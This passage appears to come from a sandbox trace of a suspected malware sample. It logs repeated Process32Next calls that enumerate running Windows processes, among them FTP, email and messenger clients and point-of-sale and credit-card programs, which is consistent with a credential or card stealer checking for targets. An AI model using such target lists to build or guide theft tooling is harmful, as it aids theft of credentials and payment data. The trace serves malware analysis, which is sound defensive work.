th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0229.461] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0229.505] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0229.561] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0229.564] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0229.566] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0229.568] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0229.570] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0229.572] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0229.578] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0229.580] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0229.582] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0229.584] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0229.586] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0229.588] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0229.593] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0229.595] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0229.596] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0229.598] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0229.599] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0229.607] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0229.609] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0229.610] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0229.612] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0229.613] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0229.615] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0229.616] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0229.618] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0229.619] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0229.624] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0229.625] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0229.627] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0229.629] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0229.630] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0229.632] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0229.633] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0229.635] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0229.639] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0229.641] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0229.642] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0229.643] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0229.645] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.646] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0229.648] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0229.649] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0229.651] CloseHandle (hObject=0x2278) returned 1 [0229.696] Sleep (dwMilliseconds=0x64) [0229.872] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0229.932] Process32First (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.936] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0229.938] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0229.939] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.940] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0229.942] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.943] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0229.945] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0229.946] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0229.951] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.953] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.954] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0229.956] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.957] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.959] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.960] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.962] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.963] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.983] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.985] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0229.986] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0229.988] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0229.989] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.991] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.992] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0229.993] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0229.995] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0229.999] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0230.001] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.002] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0230.004] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0230.005] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.006] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0230.008] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0230.009] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0230.014] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0230.015] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0230.016] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0230.018] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0230.019] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | 